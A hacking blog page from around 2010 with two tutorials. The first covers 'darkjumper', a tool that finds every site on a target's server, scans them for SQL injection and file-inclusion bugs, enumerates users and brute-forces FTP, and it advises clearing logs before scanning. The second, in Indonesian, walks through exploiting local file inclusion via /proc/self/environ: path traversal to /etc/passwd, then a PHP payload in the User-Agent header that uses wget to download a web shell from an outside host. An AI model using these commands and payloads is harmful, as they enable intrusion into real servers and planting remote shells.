DARKJUMPER V5.3 WAS RELEASE AND TUTORIAL BY GUNSLINGER_
well after darkjumper v4.0 was rock up by my big brother , mywisdom .
now i’m and mywisdom developed darkjumper v5.0 (now v5.3) and added more function in darkjumper
with this, i released this tools and some tutorial how to using this tools and what’s new in this version…
Toolname : darkjumper.py v5.3 Developed by : mywisdom & gunslinger_ <devilzc0de.com c0der> Released on : 15 ,February 2010 Download url : https://sourceforge.net/projects/darkjumper/ Function(s) 1. User enumeration(s) guessing based on 4-8 chars trial taken from every site name that host at the same server 2. Scan for sql injection,local file inclusion,remote file inclusion and blind sql injection on every site(s) at the same server 3. CGI and Path(s) Scanning 4. Portscanning 5. Autobruteforcing after user enumeration 6. Autoinjector - autocolumnfinder (mysql) if found mysql bug if found 7. Proxy added 8. Verbocity added 9. IP or proxy checker and GeoIP usefull for checking your IP or your proxy work or not Additional feature: more fake http user agent(s)
Requirement(s): - python : 2.5.x - perl
Now we’re go to tutorial section :
before scanning : make sure you always clearlog before scanning by execute clearlog.py
./clearlog.py
allright folks , now we’re ready to try execute darkjumper and show the option by
./darkjumper.py -h
or
./darkjumper.py --help
and we got like this…
in this version, we have 6 mode. there is : reverseonly | Only reverse target no checking bug surface | Checking for sqli and blind sqli on every web that host at the same target server full | Checking for sqli,blind,rfi,lfi on every web that host at the same target server cgidirs | Scanning cgidirs on the target server enum [number] | Guessing possible user enumeration on server (4-8 chars user enumeration) portscan [startport]-[endport] | Scanning open port on server target
ok there is any full description on it…
- reverseonly
in this mode, darkjumper only reverse target ip. no checking any bug .
Command is :
./darkjumper.py -t [target] -m reverseonly
Example :
- surface
This mode, darkjumper reverse the target then check sqli (sql injection vulnerability) and blind (blind sql injection vulnerability) on every web that host at the same target server
Good is in this version and up, we’re also trying to finder the column automatic if we got mysql type error ! phew !
Command is :
./darkjumper.py -t [target] -m surface
example :
- full
This mode, darkjumper will reverse target then check CGI path and checking sqli (sql injection vulnerability) , blind (blind sql injection vulnerability) , lfi (local file inclusion) , rfi (remote file inclusion) on every web that host at the same target server . autoinjector or autocolumn finder working to in this mode if we got mysql error.
Command is :
./darkjumper.py -t [target] -m full
Example :
- cgidirs
This mode, darkjumper only checking CGI path checking on your target
Command is :
./darkjumper.py -t [target] -m cgidirs
Example :
- enum
This mode, darkjumper reverse the target then Guessing possible user enumeration on server (4-8 chars user enumeration)
Command is :
./darkjumper.py -t [target] -m enum [number]
Example command :
./darkjumper.py -t [target] -m enum 4
Example :
Note : You can enable autoftpbruteforcing by :
./darkjumper.py -t [target] -m enum [number] -a
(argument -a is for autoftpbruteforcing)
Example :
- portscan
This mode, darkjumper only checking open port on your target
Command is :
./darkjumper.py -t [target] -m portscan [startport]-[endport]
Example command :
./darkjumper.py -t localhost -m portscan 15-22
Example :
You can make it verbose by :
./darkjumper.py -t localhost -m portscan 15-22 -v
Example :
And you can check your ip and your proxy .
if you wanna check your proxy your command is
./darkjumper.py -p [proxyaddress:port]
or you wanna check your own ip address
./darkjumper.py -c
You want stop your scanning? simply type this command
killall -9 /usr/bin/python & killall -9 /usr/bin/perl
allright guys that’s it ! hopely you can enjoy !!
Don’t forget to check latest version or report bug @ https://sourceforge.net/projects/darkjumper/
comming soon !! darkjumper.py v5.0
comming soon !! darkjumper.py v5.0 just wait and see baby !!
################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ \ _ \ __| _/____ # # / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # # / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # # \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # # \/ \/ \/ # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ \ \/ \/ / # # \ \___| | \/\ ___/\ / # # \___ >__| \___ >\/\_/ # # est.2007 \/ \/ forum.darkc0de.com # ################################################################ Darkjumper.py version 5.0 help module Developed by : mywisdom & gunslinger_ This tool will try to find every website that host at the same server at your target Then check for every vulnerability of each website that host at the same server Vulnerable check including: sqli,blind,lfi and rfi ----------------------------------------------------------------------------------- Usage : ./darkjumper.py -t [target] -m [option] Available option : reverseonly surface full cgidirs enum [number] [number] is 4, 5, 6, 7, 8 in range portscan [startport]-[endport] Description: - reverseonly Only reverse target no checking bug - surface Reverse target, then checking for sqli and blind sqli on every web that host at the same server - full Reverse target, then checking for sqli,blind,rfi,lfi on every web that host at the same server [this mode requires longer time,I dont suggest this mode for slow internet connection] - enum Guessing possible user enumeration on server (4-8 chars user enumeration) If you don't set number this will guesssing default to 8 chars [this mode requires number 4 until 8 for guessing users] - portscan Scanning open port on server - cgidirs Scanning cgidirs on the server ---------------------- Sample Usage: ---------------------- Reverseonly mode : Example : ./darkjumper.py -t www.jasakom.com -m reverseonly Surface scanning mode : Example : ./darkjumper.py -t www.jasakom.com -m surface Full scanning mode: Example : ./darkjumper.py -t www.jasakom.com -m full User enumeration mode : Example : ./darkjumper.py -t www.jasakom.com -m enum 8 Warning ! you must set the number of chars for user enumeration If you want to set number of chars for user guessing,it should be 4 until 8 ! don't less or greater CGI directory scanning mode : Example : ./darkjumper.py -t www.jasakom.com -m cgidirs Port scanning mode: Example : ./darkjumper.py -t www.jasakom.com -m portscan 0-80 ---------------------------------------------------------- gunslinger@localhost:~/darkjumper$
Cara menanam shell lewat LFI (Local File Inclusion) dengan metode proc/self/environ
Cara menanam shell lewat LFI (Local File Inclusion) dengan metode proc/self/environ
Penulis : gunslinger_
dengan tutorial ini saya akan menjelaskan bagaimana membuat shell pada target server lewat LFI dengan metode proc/self/environ.
Ok kita langsung saja…
1. kita menemukan website yang vulnerable terhadap serangan LFI.
contoh : http://site.com/info.php?file=news.php
2. coba kita ganti “news.php” dengan “../../../”.
contoh : http://site.com/info.php?file=../../../
lalu kita mendapat error, seperti berikut…
Warning: include(../../../) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
ok sepertinya, kita mendapat kesempatan untuk memanfaatkan include ke file lain.
selanjutanya kita coba temukan /etc/passwd.
contoh : http://site.com/info.php?file=etc/passwd
Tetapi kita masih mendapat error seperti berikut :
Warning: include(/etc/passwd) [function.include]: failed to open stream: No such file or directory in /home/gunslinger/public_html/info.php on line 99
bagaimana jika kita naikan directorynya ?
mari kita coba…
contoh : http://site.com/info.php?file=../../../../../../../../../etc/passwd
Ahoi, kita berhasil mendapatkan file /etc/passwd yang terlihat seperti berikut :
root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh syslog:x:101:102::/home/syslog:/bin/false klog:x:102:103::/home/klog:/bin/false hplip:x:103:7:HPLIP system user,,,:/var/run/hplip:/bin/false avahi-autoipd:x:104:110:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false gdm:x:105:111:Gnome Display Manager:/var/lib/gdm:/bin/false saned:x:106:113::/home/saned:/bin/false pulse:x:107:114:PulseAudio daemon,,,:/var/run/pulse:/bin/false messagebus:x:108:117::/var/run/dbus:/bin/false polkituser:x:109:118:PolicyKit,,,:/var/run/PolicyKit:/bin/false avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false haldaemon:x:111:120:Hardware abstraction layer,,,:/var/run/hald:/bin/false gunslinger:x:1000:1000:gunslinger_,,,:/home/gunslinger:/bin/bash snmp:x:112:65534::/var/lib/snmp:/bin/false guest:x:113:124:Guest,,,:/tmp/guest-home.rRZGXM:/bin/bash sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
3. mari kita check apakah /proc/self/environ bisa kita akses ?
sekarang, ganti “/etc/passwd” dengan “/proc/self/environ”
contoh : http://site.com/info.php?file=../../../../../../../../../proc/self/environ
Jika anda mendapatkan yang seperti ini :
DOCUMENT_ROOT=/home/gunslinger/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=3g4t67261b341231b94r1844ac2ad7ac HTTP_HOST=www.site.com HTTP_REFERER=http://www.site.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15) Gecko/2009102815 Ubuntu/9.04 (jaunty) Firefox/3.0.15 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/gunslinger/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=gunslinger@site.com SERVER_NAME=www.site.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 Server at www.site.com Port 80
Ternyata proc/self/environ dapat kita akses !
jika anda mendapatkan halaman yang kosong (blank) /proc/self/environ tidak dapat di akses atau mungkin juga beroperating system *BSD
4. Sekarang mari kita injeksi dengann malicious kode dengan meracuni http-headernya . bagaimana kita bisa menginjeksinya? kita bisa menggunakan tamper data pada firefox addon.
dapat anda download disini : https://addons.mozilla.org/en-US/firefox/addon/966
buka tamper data di firefox lalu masukan url /proc/self/environ yang tadi “http://site.com/info.php?file=../../../../../../../../../proc/self/environ”
lalu pada user-agent isikan dengan kode berikut :
<?system('wget http://r57.gen.tr/c100.txt -O shell.php');?>
atau
<?exec('wget http://r57.gen.tr/c100.txt -O shell.php');?>
lalu submit.
5. jika kita berhasil menginjeksi malicious kode berikut, maka shell akan ada di tempat seperti ini.
http://site.com/shell.php
happy hacking !
recent comment